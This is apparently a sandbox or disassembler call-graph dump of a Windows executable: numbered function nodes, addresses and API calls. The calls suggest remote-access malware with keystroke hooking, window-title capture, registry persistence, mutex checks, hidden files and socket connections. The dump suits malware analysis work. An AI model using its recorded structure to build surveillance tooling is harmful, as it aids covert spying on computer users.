109444->109445 109447 1233fb2a 109444->109447 109934 12332163 11 API calls 109445->109934 109447->109040 109449 12332163 109448->109449 109453 1233219f 109449->109453 109935 12332730 11 API calls 109449->109935 109451 12332184 109936 12332712 11 API calls std::_Deallocate 109451->109936 109453->109042 109455 12331e6d 109454->109455 109456 12331e75 109455->109456 109937 12332158 22 API calls 109455->109937 109456->109047 109460 123320df 11 API calls 109459->109460 109461 1233532a 109460->109461 109938 123332a0 109461->109938 109463 12335346 109463->109055 109942 123351ef 109464->109942 109466 12336391 109946 12332055 109466->109946 109469 12331fe2 109470 12331ff1 109469->109470 109471 12332039 109469->109471 109472 123323ce 11 API calls 109470->109472 109478 12331fd8 109471->109478 109473 12331ffa 109472->109473 109474 1233203c 109473->109474 109476 12332015 109473->109476 109475 1233267a 11 API calls 109474->109475 109475->109471 109978 12333098 28 API calls 109476->109978 109479 123323ce 11 API calls 109478->109479 109480 12331fe1 109479->109480 109480->109067 109482 12331fd2 109481->109482 109483 12331fc9 109481->109483 109482->109073 109979 123325e0 28 API calls 109483->109979 109980 12331fab 109485->109980 109487 1233d073 CreateMutexA GetLastError 109487->109089 109981 1234bfb7 109488->109981 109493 12331fe2 28 API calls 109494 1234b2ff 109493->109494 109495 12331fd8 11 API calls 109494->109495 109496 1234b307 109495->109496 109497 1234b35d 109496->109497 109498 123435a6 31 API calls 109496->109498 109497->109096 109499 1234b330 109498->109499 109500 1234b33b StrToIntA 109499->109500 109501 1234b352 109500->109501 109502 1234b349 109500->109502 109504 12331fd8 11 API calls 109501->109504 109990 1234cf69 22 API calls 109502->109990 109504->109497 109506 1233772a 109505->109506 109507 12343549 3 API calls 109506->109507 109508 12337731 109507->109508 109508->109106 109508->109107 109510 1234bc72 109509->109510 109991 1233b904 109510->109991 109512 1234bc7a 109512->109123 109514 12331f22 109513->109514 109515 12331f6a 109513->109515 109516 12332252 11 API calls 109514->109516 109522 12331f09 109515->109522 109517 12331f2b 109516->109517 109518 12331f6d 109517->109518 109519 12331f46 109517->109519 110030 12332336 109518->110030 110029 1233305c 28 API calls 109519->110029 109523 12332252 11 API calls 109522->109523 109524 12331f12 109523->109524 109524->109135 109526 12343965 109525->109526 109527 12336dd8 28 API calls 109526->109527 109528 1234397a 109527->109528 109529 123320f6 28 API calls 109528->109529 109530 1234398a 109529->109530 109531 1234376f 14 API calls 109530->109531 109532 12343994 109531->109532 109533 12331fd8 11 API calls 109532->109533 109534 123439a1 109533->109534 109534->109184 109536 1233209b 109535->109536 109537 123323ce 11 API calls 109536->109537 109538 123320a6 109537->109538 110034 123324ed 109538->110034 109542 123437bf 109541->109542 109545 12343788 109541->109545 109543 12331fd8 11 API calls 109542->109543 109544 1233ef9e 109543->109544 109544->109186 109546 1234379a RegSetValueExA RegCloseKey 109545->109546 109546->109542 109548 1236bac5 _strftime 109547->109548 110038 1236ae03 109548->110038 109550 1233efb7 109550->109193 109550->109195 109552 1234b505 GetLocalTime 109551->109552 109553 1234b5a0 109551->109553 109554 1233531e 28 API calls 109552->109554 109555 12331fd8 11 API calls 109553->109555 109556 1234b547 109554->109556 109557 1234b5a8 109555->109557 109559 12336383 28 API calls 109556->109559 109558 12331fd8 11 API calls 109557->109558 109560 1233f00d 109558->109560 109561 1234b553 109559->109561 109560->109210 110066 12332f10 109561->110066 109564 12336383 28 API calls 109565 1234b56b 109564->109565 110071 12337200 76 API calls 109565->110071 109567 1234b579 109568 12331fd8 11 API calls 109567->109568 109569 1234b585 109568->109569 109570 12331fd8 11 API calls 109569->109570 109571 1234b58e 109570->109571 109572 12331fd8 11 API calls 109571->109572 109573 1234b597 109572->109573 109574 12331fd8 11 API calls 109573->109574 109574->109553 109576 12339e02 _wcslen 109575->109576 109577 12339e24 109576->109577 109578 12339e0d 109576->109578 109579 1233da34 32 API calls 109577->109579 109580 1233da34 32 API calls 109578->109580 109581 12339e2c 109579->109581 109582 12339e15 109580->109582 109583 12331f13 28 API calls 109581->109583 109584 12331f13 28 API calls 109582->109584 109585 12339e3a 109583->109585 109587 12339e1f 109584->109587 109586 12331f09 11 API calls 109585->109586 109588 12339e42 109586->109588 109589 12331f09 11 API calls 109587->109589 110090 1233915b 28 API calls 109588->110090 109590 12339e79 109589->109590 110075 1233a109 109590->110075 109593 12339e54 110091 12333014 109593->110091 109597 12331f13 28 API calls 109598 12339e69 109597->109598 109599 12331f09 11 API calls 109598->109599 109599->109587 110316 1233417e 109600->110316 109605 12333014 28 API calls 109606 1234b672 109605->109606 109607 12331f09 11 API calls 109606->109607 109608 1234b67b 109607->109608 109609 12331f09 11 API calls 109608->109609 109610 1233f223 109609->109610 109610->109263 109612 12343520 RegQueryValueExA RegCloseKey 109611->109612 109613 1233f2e4 109611->109613 109612->109613 109613->109136 109613->109291 109615 12343a3f RegDeleteValueW 109614->109615 109616 1233f392 109614->109616 109615->109616 109616->109128 109618 1233dd5b 109617->109618 109619 123434ff 3 API calls 109618->109619 109620 1233dd62 109619->109620 109621 1233dd81 109620->109621 110408 12331707 109620->110408 109625 12344f2a 109621->109625 109623 1233dd6f 110411 12343877 RegCreateKeyA 109623->110411 109626 123320df 11 API calls 109625->109626 109627 12344f3e 109626->109627 110425 1234b8b3 109627->110425 109630 123320df 11 API calls 109631 12344f54 109630->109631 109632 12331e65 22 API calls 109631->109632 109633 12344f62 109632->109633 109634 1236baac _strftime 39 API calls 109633->109634 109635 12344f6f 109634->109635 109636 12344f74 Sleep 109635->109636 109637 12344f81 109635->109637 109636->109637 109638 12332093 28 API calls 109637->109638 109639 12344f90 109638->109639 109640 12331e65 22 API calls 109639->109640 109641 12344f99 109640->109641 109642 123320f6 28 API calls 109641->109642 109643 12344fa4 109642->109643 109644 1234be1b 28 API calls 109643->109644 109645 12344fac 109644->109645 110429 1233489e WSAStartup 109645->110429 109647 12344fb6 109648 12331e65 22 API calls 109647->109648 109649 12344fbf 109648->109649 109650 12331e65 22 API calls 109649->109650 109675 1234503e 109649->109675 109651 12344fd8 109650->109651 109652 12331e65 22 API calls 109651->109652 109653 12344fe9 109652->109653 109656 12331e65 22 API calls 109653->109656 109654 1234be1b 28 API calls 109654->109675 109655 12331e65 22 API calls 109655->109675 109657 12344ffa 109656->109657 109659 12331e65 22 API calls 109657->109659 109658 12336c1e 28 API calls 109658->109675 109660 1234500b 109659->109660 109662 12331e65 22 API calls 109660->109662 109661 12331fe2 28 API calls 109661->109675 109663 1234501c 109662->109663 109664 12331e65 22 API calls 109663->109664 109665 1234502e 109664->109665 110579 1233473d 88 API calls 109665->110579 109667 12332093 28 API calls 109667->109675 109668 1234b4ef 79 API calls 109668->109675 109670 1234518c WSAGetLastError 110580 1234cae1 30 API calls 109670->110580 109675->109654 109675->109655 109675->109658 109675->109661 109675->109667 109675->109668 109675->109670 109678 1233531e 28 API calls 109675->109678 109680 12331e8d 11 API calls 109675->109680 109681 12345a33 109675->109681 109683 12336383 28 API calls 109675->109683 109687 1233905c 28 API calls 109675->109687 109688 12371e81 20 API calls 109675->109688 109689 123320f6 28 API calls 109675->109689 109690 123436f8 3 API calls 109675->109690 109691 123435a6 31 API calls 109675->109691 109692 1233417e 28 API calls 109675->109692 109695 12331e65 22 API calls 109675->109695 109699 1234bb8e 28 API calls 109675->109699 109701 1234bd1e 28 API calls 109675->109701 109704 12332f10 28 API calls 109675->109704 109705 12332ea1 28 API calls 109675->109705 109707 12331fd8 11 API calls 109675->109707 109708 12331f09 11 API calls 109675->109708 109711 12345a71 CreateThread 109675->109711 110430 12344ee9 109675->110430 110435 1233482d 109675->110435 110442 12334f51 109675->110442 110457 123348c8 connect 109675->110457 110517 1234b7e0 109675->110517 110520 123445bd 109675->110520 110523 1233dd89 109675->110523 110529 1234bc42 109675->110529 110532 1234bae6 GetLastInputInfo GetTickCount 109675->110532 110533 1234ba96 109675->110533 110538 1233f8d1 GetLocaleInfoA 109675->110538 110541 12332f31 109675->110541 110546 12334aa1 109675->110546 110561 12334c10 109675->110561 110581 123352fd 28 API calls 109675->110581 110583 12334e26 WaitForSingleObject 109675->110583 109678->109675 109679 12331e65 22 API calls 109679->109681 109680->109675 109681->109679 109682 1236baac _strftime 39 API calls 109681->109682 110582 1233b051 84 API calls 109681->110582 109684 12345acf Sleep 109682->109684 109683->109675 109684->109675 109687->109675 109688->109675 109689->109675 109690->109675 109691->109675 109692->109675 109696 12345439 GetTickCount 109695->109696 109697 1234bb8e 28 API calls 109696->109697 109697->109675 109699->109675 109701->109675 109704->109675 109705->109675 109707->109675 109708->109675 109711->109675 111083 1234ad17 105 API calls 109711->111083 109712->109048 109713->109056 109714->109060 109717 123320df 11 API calls 109716->109717 109718 12336c2a 109717->109718 109719 123332a0 28 API calls 109718->109719 109720 12336c47 109719->109720 109720->109081 109722 1233eba4 109721->109722 109723 12343573 RegQueryValueExA RegCloseKey 109721->109723 109722->109078 109722->109095 109723->109722 109724->109084 109725->109114 109726->109107 109727->109099 109728->109112 109730 12331f86 11 API calls 109729->109730 109731 1233da50 109730->109731 109732 1233da70 109731->109732 109733 1233daa5 109731->109733 109734 1233da66 109731->109734 111099 1234b5b4 29 API calls 109732->111099 109737 1234bfb7 2 API calls 109733->109737 109736 1233db99 GetLongPathNameW 109734->109736 109739 1233417e 28 API calls 109736->109739 109740 1233daaa 109737->109740 109738 1233da79 109741 12331f13 28 API calls 109738->109741 109742 1233dbae 109739->109742 109743 1233db00 109740->109743 109744 1233daae 109740->109744 109745 1233da83 109741->109745 109746 1233417e 28 API calls 109742->109746 109747 1233417e 28 API calls 109743->109747 109748 1233417e 28 API calls 109744->109748 109752 12331f09 11 API calls 109745->109752 109749 1233dbbd 109746->109749 109750 1233db0e 109747->109750 109751 1233dabc 109748->109751 111084 1233ddd1 109749->111084 109755 1233417e 28 API calls 109750->109755 109756 1233417e 28 API calls 109751->109756 109752->109734 109759 1233db24 109755->109759 109760 1233dad2 109756->109760 109762 12332fa5 28 API calls 109759->109762 109763 12332fa5 28 API calls 109760->109763 109761 12332fa5 28 API calls 109764 1233dbe5 109761->109764 109765 1233db2f 109762->109765 109766 1233dadd 109763->109766 109767 12331f09 11 API calls 109764->109767 109768 12331f13 28 API calls 109765->109768 109769 12331f13 28 API calls 109766->109769 109770 1233dbef 109767->109770 109771 1233db3a 109768->109771 109772 1233dae8 109769->109772 109773 12331f09 11 API calls 109770->109773 109774 12331f09 11 API calls 109771->109774 109775 12331f09 11 API calls 109772->109775 109776 1233dbf8 109773->109776 109777 1233db43 109774->109777 109778 1233daf1 109775->109778 109779 12331f09 11 API calls 109776->109779 109780 12331f09 11 API calls 109777->109780 109781 12331f09 11 API calls 109778->109781 109782 1233dc01 109779->109782 109780->109745 109781->109745 109783 12331f09 11 API calls 109782->109783 109784 1233dc0a 109783->109784 109785 12331f09 11 API calls 109784->109785 109786 1233dc13 109785->109786 109786->109172 109787->109185 109788->109206 109790 1234371e RegQueryValueExA RegCloseKey 109789->109790 109791 12343742 109789->109791 109790->109791 109791->109165 109792->109200 109795 123644ef 109793->109795 109794 1236bd51 _Yarn 21 API calls 109794->109795 109795->109794 109796 1233f0d1 109795->109796 111104 12372f80 7 API calls 2 library calls 109795->111104 111105 12364c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 109795->111105 111106 1236526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 109795->111106 109796->109237 109801 12332093 28 API calls 109800->109801 109802 1233d9ff 109801->109802 109803 1234bc5e 28 API calls 109802->109803 109804 1233da0a 109803->109804 109805 1233da34 32 API calls 109804->109805 109806 1233da1b 109805->109806 109807 12331f09 11 API calls 109806->109807 109808 1233da24 109807->109808 109809 12331fd8 11 API calls 109808->109809 109810 1233da2c 109809->109810 109810->109269 109811->109256 109813->109300 109814->109105 109817 1234b4c5 LoadResource LockResource SizeofResource 109816->109817 109818 1233f3de 109816->109818 109817->109818 109819 1236bd51 109818->109819 109824 12376137 __Getctype 109819->109824 109820 12376175 109836 123705dd 20 API calls __dosmaperr 109820->109836 109821 12376160 RtlAllocateHeap 109823 12376173 109821->109823 109821->109824 109823->109405 109824->109820 109824->109821 109835 12372f80 7 API calls 2 library calls 109824->109835 109827 123320bf 109826->109827 109837 123323ce 109827->109837 109829 123320ca 109841 1233250a 109829->109841 109831 123320d9 109831->109408 109833 123320b7 28 API calls 109832->109833 109834 12336dec 109833->109834 109834->109415 109835->109824 109836->109823 109838 12332428 109837->109838 109839 123323d8 109837->109839 109838->109829 109839->109838 109848 123327a7 109839->109848 109842 1233251a 109841->109842 109843 12332520 109842->109843 109844 12332535 109842->109844 109859 12332569 109843->109859 109869 123328e8 109844->109869 109847 12332533 109847->109831 109849 12332e21 109848->109849 109852 123316b4 109849->109852 109851 12332e30 109851->109838 109853 123316c6 109852->109853 109854 123316cb 109852->109854 109858 1236bd19 11 API calls _Atexit 109853->109858 109854->109853 109855 123316f3 109854->109855 109855->109851 109857 1236bd18 109858->109857 109880 12332888 109859->109880 109861 1233257d 109862 12332592 109861->109862 109863 123325a7 109861->109863 109885 12332a34 22 API calls 109862->109885 109864 123328e8 28 API calls 109863->109864 109868 123325a5 109864->109868 109866 1233259b 109886 123329da 22 API calls 109866->109886 109868->109847 109870 123328f1 109869->109870 109871 12332953 109870->109871 109872 123328fb 109870->109872 109894 123328a4 22 API calls 109871->109894 109875 12332904 109872->109875 109877 12332917 109872->109877 109888 12332cae 109875->109888 109878 12332915 109877->109878 109879 123323ce 11 API calls 109877->109879 109878->109847 109879->109878 109881 12332890 109880->109881 109882 12332898 109881->109882 109887 12332ca3 22 API calls 109881->109887 109882->109861 109885->109866 109886->109868 109889 12332cb8 __EH_prolog 109888->109889 109895 12332e54 22 API calls 109889->109895 109891 123323ce 11 API calls 109893 12332d92 109891->109893 109892 12332d24 109892->109891 109893->109878 109895->109892 109897 123320e7 109896->109897 109898 123323ce 11 API calls 109897->109898 109899 123320f2 109898->109899 109899->109443 109914 1233423a 109900->109914 109904 1234ce41 109903->109904 109905 1234cea0 109904->109905 109909 1234ce51 109904->109909 109906 1234ceba 109905->109906 109925 1234cfe0 28 API calls 109905->109925 109908 1234d146 28 API calls 109906->109908 109911 1234ce9c 109908->109911 109910 1234ce89 109909->109910 109920 1234cfe0 28 API calls 109909->109920 109921 1234d146 109910->109921 109911->109443 109915 12334243 109914->109915 109916 123323ce 11 API calls 109915->109916 109917 1233424e 109916->109917 109918 12332569 28 API calls 109917->109918 109919 123341b5 109918->109919 109919->109443 109920->109910 109922 1234d14f 109921->109922 109926 1234d1f2 109922->109926 109925->109906 109927 1234d1fb 109926->109927 109930 1234d2a0 109927->109930 109932 1234d2ab 109930->109932 109931 1234d159 109931->109911 109932->109931 109933 123320f6 28 API calls 109932->109933 109933->109931 109934->109447 109935->109451 109936->109453 109940 123332aa 109938->109940 109939 123332c9 109939->109463 109940->109939 109941 123328e8 28 API calls 109940->109941 109941->109939 109943 123351fb 109942->109943 109952 12335274 109943->109952 109945 12335208 109945->109466 109947 12332061 109946->109947 109948 123323ce 11 API calls 109947->109948 109949 1233207b 109948->109949 109974 1233267a 109949->109974 109953 12335282 109952->109953 109954 12335288 109953->109954 109955 1233529e 109953->109955 109963 123325f0 109954->109963 109956 123352b6 109955->109956 109957 123352f5 109955->109957 109961 123328e8 28 API calls 109956->109961 109962 1233529c 109956->109962 109972 123328a4 22 API calls 109957->109972 109961->109962 109962->109945 109964 12332888 22 API calls 109963->109964 109965 12332602 109964->109965 109966 12332672 109965->109966 109967 12332629 109965->109967 109973 123328a4 22 API calls 109966->109973 109969 123328e8 28 API calls 109967->109969 109971 1233263b 109967->109971 109969->109971 109971->109962 109975 1233268b 109974->109975 109976 123323ce 11 API calls 109975->109976 109977 1233208d 109976->109977 109977->109469 109978->109471 109979->109482 109982 1234bfc4 GetCurrentProcess IsWow64Process 109981->109982 109983 1234b2d1 109981->109983 109982->109983 109984 1234bfdb 109982->109984 109985 123435a6 RegOpenKeyExA 109983->109985 109984->109983 109986 123435d4 RegQueryValueExA RegCloseKey 109985->109986 109987 123435fe 109985->109987 109986->109987 109988 12332093 28 API calls 109987->109988 109989 12343613 109988->109989 109989->109493 109990->109501 109992 1233b90c 109991->109992 109997 12332252 109992->109997 109994 1233b917 110001 1233b92c 109994->110001 109996 1233b926 109996->109512 109998 1233225c 109997->109998 109999 123322ac 109997->109999 109998->109999 110008 12332779 11 API calls std::_Deallocate 109998->110008 109999->109994 110002 1233b966 110001->110002 110003 1233b938 110001->110003 110020 123328a4 22 API calls 110002->110020 110009 123327e6 110003->110009 110007 1233b942 110007->109996 110008->109999 110010 123327ef 110009->110010 110011 12332851 110010->110011 110012 123327f9 110010->110012 110027 123328a4 22 API calls 110011->110027 110015 12332802 110012->110015 110017 12332815 110012->110017 110021 12332aea 110015->110021 110018 12332813 110017->110018 110019 12332252 11 API calls 110017->110019 110018->110007 110019->110018 110022 12332af4 __EH_prolog 110021->110022 110028 12332e45 22 API calls 110022->110028 110024 12332252 11 API calls 110026 12332bce 110024->110026 110025 12332b60 110025->110024 110026->110018 110028->110025 110029->109515 110031 12332347 110030->110031 110032 12332252 11 API calls 110031->110032 110033 123323c7 110032->110033 110033->109515 110035 123324f9 110034->110035 110036 1233250a 28 API calls 110035->110036 110037 123320b1 110036->110037 110037->109179 110054 1236ba0a 110038->110054 110040 1236ae50 110060 1236a7b7 35 API calls 2 library calls 110040->110060 110041 1236ae15 110041->110040 110042 1236ae2a 110041->110042 110053 1236ae2f __cftof 110041->110053 110059 123705dd 20 API calls __dosmaperr 110042->110059 110046 1236ae5c 110047 1236ae8b 110046->110047 110061 1236ba4f 39 API calls __Toupper 110046->110061 110048 1236aef7 110047->110048 110062 1236b9b6 20 API calls 2 library calls 110047->110062 110063 1236b9b6 20 API calls 2 library calls 110048->110063 110051 1236afbe _strftime 110051->110053 110064 123705dd 20 API calls __dosmaperr 110051->110064 110053->109550 110055 1236ba22 110054->110055 110056 1236ba0f 110054->110056 110055->110041 110065 123705dd 20 API calls __dosmaperr 110056->110065 110058 1236ba14 __cftof 110058->110041 110059->110053 110060->110046 110061->110046 110062->110048 110063->110051 110064->110053 110065->110058 110072 12331fb0 110066->110072 110068 12332f1e 110069 12332055 11 API calls 110068->110069 110070 12332f2d 110069->110070 110070->109564 110071->109567 110073 123325f0 28 API calls 110072->110073 110074 12331fbd 110073->110074 110074->110068 110076 1233a127 110075->110076 110077 12343549 3 API calls 110076->110077 110078 1233a12e 110077->110078 110079 1233a142 110078->110079 110080 1233a15c 110078->110080 110082 1233a147 110079->110082 110083 12339e9b 110079->110083 110096 1233905c 110080->110096 110085 1233905c 28 API calls 110082->110085 110083->109229 110086 1233a155 110085->110086 110124 1233a22d 29 API calls 110086->110124 110089 1233a15a 110089->110083 110090->109593 110284 12333222 110091->110284 110093 12333022 110288 12333262 110093->110288 110097 12339072 110096->110097 110098 12332252 11 API calls 110097->110098 110099 1233908c 110098->110099 110125 12334267 110099->110125 110101 1233909a 110102 1233a179 110101->110102 110137 1233b8ec 110102->110137 110105 1233a1a2 110108 12332093 28 API calls 110105->110108 110106 1233a1ca 110107 12332093 28 API calls 110106->110107 110109 1233a1d5 110107->110109 110110 1233a1ac 110108->110110 110111 12332093 28 API calls 110109->110111 110112 1234bc5e 28 API calls 110110->110112 110113 1233a1e4 110111->110113 110114 1233a1ba 110112->110114 110116 1234b4ef 79 API calls 110113->110116 110141 1233b164 31 API calls _Yarn 110114->110141 110118 1233a1e9 CreateThread 110116->110118 110117 1233a1c1 110119 12331fd8 11 API calls 110117->110119 110120 1233a210 CreateThread 110118->110120 110121 1233a204 CreateThread 110118->110121 110149 1233a27d 110118->110149 110119->110106 110122 12331f09 11 API calls 110120->110122 110143 1233a289 110120->110143 110121->110120 110146 1233a267 110121->110146 110123 1233a224 110122->110123 110123->110083 110124->110089 110283 1233a273 163 API calls 110124->110283 110126 12332888 22 API calls 110125->110126 110127 1233427b 110126->110127 110128 12334290 110127->110128 110129 123342a5 110127->110129 110135 123342df 22 API calls 110128->110135 110131 123327e6 28 API calls 110129->110131 110134 123342a3 110131->110134 110132 12334299 110136 12332c48 22 API calls 110132->110136 110134->110101 110135->110132 110136->110134 110138 1233b8f5 110137->110138 110139 1233a197 110137->110139 110142 1233b96c 28 API calls 110138->110142 110139->110105 110139->110106 110141->110117 110142->110139 110152 1233acd6 110143->110152 110203 1233a2b8 110146->110203 110224 1233a726 110149->110224 110162 1233ace4 110152->110162 110153 1233a292 110154 1233ad3e Sleep GetForegroundWindow GetWindowTextLengthW 110155 1233b904 28 API calls 110154->110155 110155->110162 110159 1234bae6 GetLastInputInfo GetTickCount 110159->110162 110161 1233ad84 GetWindowTextW 110161->110162 110162->110153 110162->110154 110162->110159 110162->110161 110164 12331f09 11 API calls 110162->110164 110165 1233aedc 110162->110165 110166 1233b8ec 28 API calls 110162->110166 110168 1233ae49 Sleep 110162->110168 110171 12332093 28 API calls 110162->110171 110172 1233add1 110162->110172 110176 12336383 28 API calls 110162->110176 110178 12333014 28 API calls 110162->110178 110179 1234bc5e 28 API calls 110162->110179 110180 1233a636 29 API calls 110162->110180 110181 12331fd8 11 API calls 110162->110181 110182 123643e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 110162->110182 110183 12331f86 110162->110183 110187 12364770 23 API calls __onexit 110162->110187 110188 123643a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 110162->110188 110189 12339044 28 API calls 110162->110189 110191 1233b97c 28 API calls 110162->110191 110192 1233b748 40 API calls 2 library calls 110162->110192 110193 12371e81 110162->110193 110197 123352fd 28 API calls 110162->110197 110164->110162 110167 12331f09 11 API calls 110165->110167 110166->110162 110167->110153 110168->110162 110171->110162 110172->110162 110174 1233905c 28 API calls 110172->110174 110190 1233b164 31 API calls _Yarn 110172->110190 110174->110172 110176->110162 110178->110162 110179->110162 110180->110162 110181->110162 110184 12331f8e 110183->110184 110185 12332252 11 API calls 110184->110185 110186 12331f99 110185->110186 110186->110162 110187->110162 110188->110162 110189->110162 110190->110172 110191->110162 110192->110162 110194 12371e8d 110193->110194 110198 12371c7d 110194->110198 110196 12371eae 110196->110162 110199 12371c94 110198->110199 110201 12371ccb __cftof 110199->110201 110202 123705dd 20 API calls __dosmaperr 110199->110202 110201->110196 110202->110201 110204 1233a333 KiUserCallbackDispatcher 110203->110204 110205 1233a2d1 GetModuleHandleA SetWindowsHookExA 110203->110205 110206 1233a345 TranslateMessage DispatchMessageA 110204->110206 110208 1233a270 110204->110208 110205->110204 110207 1233a2ed GetLastError 110205->110207 110206->110204 110206->110208 110218 1234bb8e 110207->110218 110219 12371e81 20 API calls 110218->110219 110220 1234bbb2 110219->110220 110221 12332093 28 API calls 110220->110221 110222 1233a2fe 110221->110222 110223 123352fd 28 API calls 110222->110223 110225 1233a73b Sleep 110224->110225 110245 1233a675 110225->110245 110227 1233a286 110228 1233a77b CreateDirectoryW 110234 1233a74d 110228->110234 110229 1233a78c GetFileAttributesW 110229->110234 110230 1233a7a3 SetFileAttributesW 110230->110234 110231 123320df 11 API calls 110242 1233a7ee 110231->110242 110233 1233a81d PathFileExistsW 110233->110242 110234->110225 110234->110227 110234->110228 110234->110229 110234->110230 110235 12331e65 22 API calls 110234->110235 110234->110242 110258 1234c3f1 110234->110258 110235->110234 110237 123320b7 28 API calls 110237->110242 110238 1233a926 SetFileAttributesW 110238->110234 110239 12336dd8 28 API calls 110239->110242 110240 12331fe2 28 API calls 110240->110242 110242->110231 110242->110233 110242->110237 110242->110238 110242->110239 110242->110240 110243 12331fd8 11 API calls 110242->110243 110244 12331fd8 11 API calls 110242->110244 110268 1234c485 CreateFileW 110242->110268 110276 1234c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 110242->110276 110243->110242 110244->110234 110246 1233a722 110245->110246 110249 1233a68b 110245->110249 110246->110234 110247 1233a6aa CreateFileW 110248 1233a6b8 GetFileSize 110247->110248 110247->110249 110248->110249 110250 1233a6ed FindCloseChangeNotification 110248->110250 110249->110247 110249->110250 110251 1233a6ff 110249->110251 110252 1233a6e2 Sleep 110249->110252 110253 1233a6db 110249->110253 110250->110249 110251->110246 110255 1233905c 28 API calls 110251->110255 110252->110250 110277 1233b0dc 83 API calls 110253->110277 110256 1233a71b 110255->110256 110257 1233a179 124 API calls 110256->110257 110257->110246 110259 1234c404 CreateFileW 110258->110259 110261 1234c441 110259->110261 110262 1234c43d 110259->110262 110263 1234c461 WriteFile 110261->110263 110264 1234c448 SetFilePointer 110261->110264 110262->110234 110266 1234c474 110263->110266 110267 1234c476 FindCloseChangeNotification 110263->110267 110264->110263 110265 1234c458 CloseHandle 110264->110265 110265->110262 110266->110267 110267->110262 110269 1234c4af GetFileSize 110268->110269 110270 1234c4ab 110268->110270 110278 1233244e 110269->110278 110270->110242 110272 1234c4c3 110273 1234c4d5 ReadFile 110272->110273 110274 1234c4e4 FindCloseChangeNotification 110273->110274 110275 1234c4e2 110273->110275 110274->110270 110275->110274 110276->110242 110277->110252 110279 12332456 110278->110279 110281 12332460 110279->110281 110282 12332a51 28 API calls 110279->110282 110281->110272 110282->110281 110285 1233322e 110284->110285 110294 12333618 110285->110294 110287 1233323b 110287->110093 110289 1233326e 110288->110289 110290 12332252 11 API calls 110289->110290 110291 12333288 110290->110291 110292 12332336 11 API calls 110291->110292 110293 12333031 110292->110293 110293->109597 110295 12333626 110294->110295 110296 1233362c 110295->110296 110297 12333644 110295->110297 110305 123336a6 110296->110305 110299 1233369e 110297->110299 110300 1233365c 110297->110300 110314 123328a4 22 API calls 110299->110314 110303 123327e6 28 API calls 110300->110303 110304 12333642 110300->110304 110303->110304 110304->110287 110306 12332888 22 API calls 110305->110306 110307 123336b9 110306->110307 110308 123336de 110307->110308 110309 1233372c 110307->110309 110312 123327e6 28 API calls 110308->110312 110313 123336f0 110308->110313 110315 123328a4 22 API calls 110309->110315 110312->110313 110313->110304 110317 12334186 110316->110317 110318 12332252 11 API calls 110317->110318 110319 12334191 110318->110319 110327 123341bc 110319->110327 110322 123342fc 110338 12334353 110322->110338 110324 1233430a 110325 12333262 11 API calls 110324->110325 110326 12334319 110325->110326 110326->109605 110328 123341c8 110327->110328 110331 123341d9 110328->110331 110330 1233419c 110330->110322 110332 123341e9 110331->110332 110333 12334206 110332->110333 110334 123341ef 110332->110334 110335 123327e6 28 API calls 110333->110335 110336 12334267 28 API calls 110334->110336 110337 12334204 110335->110337 110336->110337 110337->110330 110339 1233435f 110338->110339 110342 12334371 110339->110342 110341 1233436d 110341->110324 110343 1233437f 110342->110343 110344 12334385 110343->110344 110345 1233439e 110343->110345 110406 123334e6 28 API calls 110344->110406 110346 12332888 22 API calls 110345->110346 110347 123343a6 110346->110347 110349 12334419 110347->110349 110350 123343bf 110347->110350 110407 123328a4 22 API calls 110349->110407 110352 123327e6 28 API calls 110350->110352 110361 1233439c 110350->110361 110352->110361 110361->110341 110406->110361 110414 1236aa9a 110408->110414 110412 1234388f RegSetValueExA RegCloseKey 110411->110412 110413 123438b9 110411->110413 110412->110413 110413->109621 110417 1236aa1b 110414->110417 110416 1233170d 110416->109623 110418 1236aa3e 110417->110418 110419 1236aa2a 110417->110419 110422 1236aa2f __alldvrm __cftof 110418->110422 110424 12378957 11 API calls 2 library calls 110418->110424 110423 123705dd 20 API calls __dosmaperr 110419->110423 110422->110416 110423->110422 110424->110422 110427 1234b8f9 _Yarn ___scrt_get_show_window_mode 110425->110427 110426 12332093 28 API calls 110428 12344f49 110426->110428 110427->110426 110428->109630 110429->109647 110431 12344f02 getaddrinfo WSASetLastError 110430->110431 110432 12344ef8 110430->110432 110431->109675 110596 12344d86 29 API calls ___std_exception_copy 110432->110596 110434 12344efd 110434->110431 110436 12334846 socket 110435->110436 110437 12334839 110435->110437 110438 12334842 110436->110438 110439 12334860 CreateEventW 110436->110439 110597 1233489e WSAStartup 110437->110597 110438->109675 110439->109675 110441 1233483e 110441->110436 110441->110438 110443 12334f65 110442->110443 110444 12334fea 110442->110444 110445 12334f6e 110443->110445 110446 12334fc0 CreateEventA CreateThread 110443->110446 110447 12334f7d GetLocalTime 110443->110447 110444->109675 110445->110446 110446->110444 110599 12335150 110446->110599 110448 1234bb8e 28 API calls 110447->110448 110449 12334f91 110448->110449 110598 123352fd 28 API calls 110449->110598 110458 12334a1b 110457->110458 110459 123348ee 110457->110459 110460 1233497e 110458->110460 110461 12334a21 WSAGetLastError 110458->110461 110459->110460 110464 1233531e 28 API calls 110459->110464 110484 12334923 110459->110484 110460->109675 110461->110460 110462 12334a31 110461->110462 110465 12334932 110462->110465 110466 12334a36 110462->110466 110468 1233490f 110464->110468 110470 12332093 28 API calls 110465->110470 110608 1234cae1 30 API calls 110466->110608 110467 1233492b 110467->110465 110473 12334941 110467->110473 110471 12332093 28 API calls 110468->110471 110474 12334a80 110470->110474 110475 1233491e 110471->110475 110472 12334a40 110609 123352fd 28 API calls 110472->110609 110481 12334950 110473->110481 110482 12334987 110473->110482 110477 12332093 28 API calls 110474->110477 110478 1234b4ef 79 API calls 110475->110478 110483 12334a8f 110477->110483 110478->110484 110487 12332093 28 API calls 110481->110487 110605 12351a40 53 API calls 110482->110605 110488 1234b4ef 79 API calls 110483->110488 110603 12350c60 27 API calls 110484->110603 110491 1233495f 110487->110491 110488->110460 110490 1233498f 110493 123349c4 110490->110493 110494 12334994 110490->110494 110495 12332093 28 API calls 110491->110495 110607 12350e06 28 API calls 110493->110607 110497 12332093 28 API calls 110494->110497 110498 1233496e 110495->110498 110500 123349a3 110497->110500 110501 1234b4ef 79 API calls 110498->110501 110503 12332093 28 API calls 110500->110503 110504 12334973 110501->110504 110502 123349cc 110505 123349f9 CreateEventW CreateEventW 110502->110505 110506 12332093 28 API calls 